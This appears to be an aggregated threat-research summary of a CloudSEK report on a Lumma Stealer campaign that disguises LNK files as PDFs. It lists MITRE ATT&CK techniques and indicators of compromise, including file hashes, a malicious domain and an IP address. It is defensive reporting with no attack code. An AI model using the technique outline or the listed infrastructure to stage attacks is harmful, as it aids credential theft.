FOCUS MODE
EXTRACT IOC
Threat Research

Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions’ Infrastructure | CloudSEK

CloudSek
Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions’ Infrastructure | CloudSEK
Lumma Stealer is a sophisticated information-stealing malware promoted via a Malware-as-a-Service (MaaS) model that primarily targets multiple sectors through malicious LNK files disguised as legitimate documents. This malware campaign employs a multi-stage infection process and aims to gather sensitive user data. Affected: Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, Media & Journalism

Keypoints :

  • Lumma Stealer is offered as Malware-as-a-Service (MaaS).
  • Designed to steal sensitive information such as passwords and cryptocurrency wallets.
  • Malware campaign uses malicious LNK files appearing as PDF documents to trick users.
  • The infection process includes multiple stages initiated by executing LNK files.
  • Victim sectors include education, corporate, government, healthcare, finance, engineering, and media.
  • The campaign relies on user awareness and robust security measures to prevent infection.

MITRE Techniques :

  • Execution (TA0002): T1059 – Command and Scripting Interpreter: PowerShell is used to run scripts from the LNK file.
  • Execution (TA0002): T1204.002 – User Execution: Malicious File that executes upon user interaction with the LNK file.
  • Execution (TA0002): T1047 – Windows Management Instrumentation (WMI) used for executing commands.
  • Persistence (TA0003): T1547.001 – Registry Run Keys / Startup Folder is used to maintain persistence.
  • Privilege Escalation (TA0004): T1218.011 – System Binary Proxy Execution: Rundll32 used for executing malicious code.
  • Defense Evasion (TA0005): T1027 – Obfuscated Files or Information to hide malicious scripts.
  • Defense Evasion (TA0005): T1036.003 – Masquerading: Rename System Utilities to disguise malicious files.
  • Credential Access (TA0006): T1012 – Query Registry to access sensitive information.
  • Discovery (TA0007): T1082 – System Information Discovery for gathering system details.
  • Lateral Movement (TA0008): T1021.002 – Remote Services: SMB/Windows Admin Shares used for lateral movement.
  • Collection (TA0009): T1114 – Email Collection to gather sensitive emails.
  • Collection (TA0009): T1560 – Archive Collected Data for exfiltration purposes.
  • Command and Control (TA0011): T1071 – Application Layer Protocol for communication with C2 servers.
  • Exfiltration (TA0010): T1041 – Exfiltration Over C2 Channel enabled for data theft.
  • Impact (TA0040): T1489 – Service Stop to disrupt services.
  • Impact (TA0040): T1490 – Inhibit System Recovery to prevent recovery efforts.

Indicator of Compromise :

  • [Hash (SHA-256)] BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A (pdf.lnk)
  • [Hash (SHA-256)] e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2 (Kompass-4.1.2.exe)
  • [Hash (SHA-256)] 40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15 (Samarik)
  • [Domain] tripeggyun.fun
  • [IP Address] 87.120.115.240

Full Story: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure

Tags: PROXY, DISCOVERY, WINDOWS, FINANCIAL, BROWSER, COLLECTION, PHISHING, LATERAL MOVEMENT